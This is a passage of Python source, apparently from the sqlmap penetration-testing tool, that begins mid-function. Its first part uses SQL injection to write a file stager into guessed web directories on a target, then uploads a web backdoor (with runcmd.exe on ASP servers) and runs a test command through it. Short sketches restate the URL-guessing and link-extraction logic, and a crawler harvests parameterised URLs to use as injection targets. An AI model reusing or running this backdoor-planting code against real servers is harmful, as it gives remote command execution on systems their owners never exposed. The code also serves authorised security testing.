            cookie = None

            if PLACE.COOKIE in conf.parameters:
                cookie = conf.parameters[PLACE.COOKIE]
            elif headers and HTTP_HEADER.SET_COOKIE in headers:
                cookie = headers[HTTP_HEADER.SET_COOKIE]

            if cookie:
                value = re.sub(r"(\A|;)(\w+)=[^;]*", r"\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", cookie)

                if value != cookie:
                    page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
                    parseFilePaths(page)

                value = re.sub(r"(\A|;)(\w+)=[^;]*", r"\g<2>=", cookie)

                if value != cookie:
                    page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
                    parseFilePaths(page)

    directories = list(arrayizeValue(getManualDirectories()))
    directories.extend(getAutoDirectories())
    directories = list(OrderedSet(directories))

    path = _urllib.parse.urlparse(conf.url).path or '/'
    path = re.sub(r"/[^/]*\.\w+\Z", '/', path)

    if path != '/':
        _ = []

        for directory in directories:
            _.append(directory)

            if not directory.endswith(path):
                _.append("%s/%s" % (directory.rstrip('/'), path.strip('/')))

        directories = _

    backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webPlatform)
    backdoorContent = getText(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoors", "backdoor.%s_" % self.webPlatform)))

    stagerContent = getText(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webPlatform)))

    for directory in directories:
        if not directory:
            continue

        stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webPlatform)
        self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)

        uploaded = False
        directory = ntToPosixSlashes(normalizePath(directory))

        if not isWindowsDriveLetterPath(directory) and not directory.startswith('/'):
            directory = "/%s" % directory

        if not directory.endswith('/'):
            directory += '/'

        # Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method
        infoMsg = "trying to upload the file stager on '%s' " % directory
        infoMsg += "via LIMIT 'LINES TERMINATED BY' method"
        logger.info(infoMsg)

        self._webFileInject(stagerContent, stagerName, directory)

        for match in re.finditer('/', directory):
            self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
            self.webStagerUrl = _urllib.parse.urljoin(self.webBaseUrl, stagerName)

            debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
            logger.debug(debugMsg)

            uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
            uplPage = uplPage or ""

            if "sqlmap file uploader" in uplPage:
                uploaded = True
                break

        # Fall-back to UNION queries file upload method
        if not uploaded:
            warnMsg = "unable to upload the file stager "
            warnMsg += "on '%s'" % directory
            singleTimeWarnMessage(warnMsg)

            if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
                infoMsg = "trying to upload the file stager on '%s' " % directory
                infoMsg += "via UNION method"
                logger.info(infoMsg)

                stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webPlatform)
                self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)

                handle, filename = tempfile.mkstemp()
                os.close(handle)

                with openFile(filename, "w+b") as f:
                    _ = getText(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webPlatform)))
                    _ = _.replace(SHELL_WRITABLE_DIR_TAG, directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
                    f.write(_)

                self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True)

                for match in re.finditer('/', directory):
                    self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
                    self.webStagerUrl = _urllib.parse.urljoin(self.webBaseUrl, stagerName)

                    debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
                    logger.debug(debugMsg)

                    uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
                    uplPage = uplPage or ""

                    if "sqlmap file uploader" in uplPage:
                        uploaded = True
                        break

        if not uploaded:
            continue

        if "<%" in uplPage or "<?" in uplPage:
            warnMsg = "file stager uploaded on '%s', " % directory
            warnMsg += "but not dynamically interpreted"
            logger.warn(warnMsg)
            continue

        elif self.webPlatform == WEB_PLATFORM.ASPX:
            kb.data.__EVENTVALIDATION = extractRegexResult(EVENTVALIDATION_REGEX, uplPage)
            kb.data.__VIEWSTATE = extractRegexResult(VIEWSTATE_REGEX, uplPage)

        infoMsg = "the file stager has been successfully uploaded "
        infoMsg += "on '%s' - %s" % (directory, self.webStagerUrl)
        logger.info(infoMsg)

        if self.webPlatform == WEB_PLATFORM.ASP:
            match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)

            if match:
                backdoorDirectory = match.group(1)
            else:
                continue

            _ = "tmpe%s.exe" % randomStr(lowercase=True)
            if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace(SHELL_WRITABLE_DIR_TAG, backdoorDirectory).replace(SHELL_RUNCMD_EXE_TAG, _)):
                self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_EXTRAS_PATH, "runcmd", "runcmd.exe_"))
                self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName)
                self.webDirectory = backdoorDirectory
            else:
                continue

        else:
            if not self.webUpload(backdoorName, posixToNtSlashes(directory) if Backend.isOs(OS.WINDOWS) else directory, content=backdoorContent):
                warnMsg = "backdoor has not been successfully uploaded "
                warnMsg += "through the file stager possibly because "
                warnMsg += "the user running the web server process "
                warnMsg += "has no write privileges over the folder "
                warnMsg += "where the user running the DBMS process "
                warnMsg += "was able to upload the file stager or "
                warnMsg += "because the DBMS and web server sit on "
                warnMsg += "different servers"
                logger.warn(warnMsg)

                message = "do you want to try the same method used "
                message += "for the file stager? [Y/n] "

                if readInput(message, default='Y', boolean=True):
                    self._webFileInject(backdoorContent, backdoorName, directory)
                else:
                    continue

            self.webBackdoorUrl = posixpath.join(ntToPosixSlashes(self.webBaseUrl), backdoorName)
            self.webDirectory = directory

        self.webBackdoorFilePath = posixpath.join(ntToPosixSlashes(directory), backdoorName)

        testStr = "command execution test"
        output = self.webBackdoorRunCmd("echo %s" % testStr)

        if output == "0":
            warnMsg = "the backdoor has been uploaded but required privileges "
            warnMsg += "for running the system commands are missing"
            raise SqlmapNoneDataException(warnMsg)
        elif output and testStr in output:
            infoMsg = "the backdoor has been successfully "
        else:
            infoMsg = "the backdoor has probably been successfully "

        infoMsg += "uploaded on '%s' - " % self.webDirectory
        infoMsg += self.webBackdoorUrl
        logger.info(infoMsg)

        break
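
# A standalone sketch of how webInit() above derives candidate stager URLs from
# a writable directory: every '/' inside the normalized path yields one base URL
# to probe (scheme/host/port values here are made-up examples).
import re

def candidate_urls(scheme, hostname, port, directory, stager_name):
    directory = directory.replace("\\", '/')  # NT -> POSIX slashes
    if not directory.startswith('/'):
        directory = "/%s" % directory
    if not directory.endswith('/'):
        directory += '/'
    urls = []
    for match in re.finditer('/', directory):
        # progressively shorter path suffixes, mimicking document-root guessing
        base = "%s://%s:%d%s/" % (scheme, hostname, port, directory[match.start():].rstrip('/'))
        urls.append(base + stager_name)
    return urls

# candidate_urls("http", "victim", 80, "/var/www/html", "tmpuabcd.php")
# probes "/var/www/html/...", "/www/html/...", "/html/..." and "/..." in turn
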
def crawl(target):
    try:
        visited = set()
        threadData = getCurrentThreadData()
        threadData.shared.value = OrderedSet()

        def crawlThread():
            threadData = getCurrentThreadData()

            while kb.threadContinue:
                with kb.locks.limit:
                    if threadData.shared.unprocessed:
                        current = threadData.shared.unprocessed.pop()
                        if current in visited:
                            continue
                        elif conf.crawlExclude and re.search(conf.crawlExclude, current):
                            dbgMsg = "skipping '%s'" % current
                            logger.debug(dbgMsg)
                            continue
                        else:
                            visited.add(current)
                    else:
                        break

                content = None

                try:
                    if current:
                        content = Request.getPage(url=current, crawling=True, raise404=False)[0]
                except SqlmapConnectionException as ex:
                    errMsg = "connection exception detected ('%s'). skipping " % getSafeExString(ex)
                    errMsg += "URL '%s'" % current
                    logger.critical(errMsg)
                except SqlmapSyntaxException:
                    errMsg = "invalid URL detected. skipping '%s'" % current
                    logger.critical(errMsg)
                except _http_client.InvalidURL as ex:
                    errMsg = "invalid URL detected ('%s'). skipping " % getSafeExString(ex)
                    errMsg += "URL '%s'" % current
                    logger.critical(errMsg)

                if not kb.threadContinue:
                    break

                if isinstance(content, six.text_type):
                    try:
                        match = re.search(r"(?si)<html[^>]*>(.+)</html>", content)
                        if match:
                            content = "<html>%s</html>" % match.group(1)

                        soup = BeautifulSoup(content)
                        tags = soup('a')

                        if not tags:
                            tags = re.finditer(r'(?i)<a[^>]+href="(?P<href>[^>"]+)"', content)

                        for tag in tags:
                            href = tag.get("href") if hasattr(tag, "get") else tag.group("href")

                            if href:
                                if threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID:
                                    current = threadData.lastRedirectURL[1]
                                url = _urllib.parse.urljoin(current, href)

                                # flag to know if we are dealing with the same target host
                                _ = checkSameHost(url, target)

                                if conf.scope:
                                    if not re.search(conf.scope, url, re.I):
                                        continue
                                elif not _:
                                    continue

                                if url.split('.')[-1].lower() not in CRAWL_EXCLUDE_EXTENSIONS:
                                    with kb.locks.value:
                                        threadData.shared.deeper.add(url)
                                        if re.search(r"(.*?)\?(.+)", url):
                                            threadData.shared.value.add(url)
                    except UnicodeEncodeError:  # for non-HTML files
                        pass
                    except ValueError:  # for non-valid links
                        pass
                    finally:
                        if conf.forms:
                            findPageForms(content, current, False, True)

                if conf.verbose in (1, 2):
                    threadData.shared.count += 1
                    status = '%d/%d links visited (%d%%)' % (threadData.shared.count, threadData.shared.length, round(100.0 * threadData.shared.count / threadData.shared.length))
                    dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True)

        threadData.shared.deeper = set()
        threadData.shared.unprocessed = set([target])

        if not conf.sitemapUrl:
            message = "do you want to check for the existence of "
            message += "site's sitemap(.xml) [y/N] "

            if readInput(message, default='N', boolean=True):
                found = True
                items = None
                url = _urllib.parse.urljoin(target, "/sitemap.xml")

                try:
                    items = parseSitemap(url)
                except SqlmapConnectionException as ex:
                    if "page not found" in getSafeExString(ex):
                        found = False
                        logger.warn("'sitemap.xml' not found")
                except:
                    pass
                finally:
                    if found:
                        if items:
                            for item in items:
                                if re.search(r"(.*?)\?(.+)", item):
                                    threadData.shared.value.add(item)

                            if conf.crawlDepth > 1:
                                threadData.shared.unprocessed.update(items)

                        logger.info("%s links found" % ("no" if not items else len(items)))

        infoMsg = "starting crawler"
        if conf.bulkFile:
            infoMsg += " for target URL '%s'" % target
        logger.info(infoMsg)

        for i in xrange(conf.crawlDepth):
            threadData.shared.count = 0
            threadData.shared.length = len(threadData.shared.unprocessed)
            numThreads = min(conf.threads, len(threadData.shared.unprocessed))

            if not conf.bulkFile:
                logger.info("searching for links with depth %d" % (i + 1))

            runThreads(numThreads, crawlThread, threadChoice=(i > 0))
            clearConsoleLine(True)

            if threadData.shared.deeper:
                threadData.shared.unprocessed = set(threadData.shared.deeper)
            else:
                break

    except KeyboardInterrupt:
        warnMsg = "user aborted during crawling. sqlmap "
        warnMsg += "will use partial list"
        logger.warn(warnMsg)

    finally:
        clearConsoleLine(True)

        if not threadData.shared.value:
            warnMsg = "no usable links found (with GET parameters)"
            logger.warn(warnMsg)
        else:
            for url in threadData.shared.value:
                kb.targets.add((urldecode(url, kb.pageEncoding), None, None, None, None))

        storeResultsToFile(kb.targets)
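
# A standalone sketch of the link-extraction fallback in the older crawl()
# revision above: when BeautifulSoup yields no <a> tags, a regex pulls href
# values directly out of the raw markup (sample HTML is made up).
import re
from urllib.parse import urljoin

def extract_links(base_url, content):
    links = []
    for match in re.finditer(r'(?i)<a[^>]+href="(?P<href>[^>"]+)"', content):
        links.append(urljoin(base_url, match.group("href")))
    return links

# extract_links("http://t/", '<a href="cat.php?id=1">x</a>') -> ['http://t/cat.php?id=1']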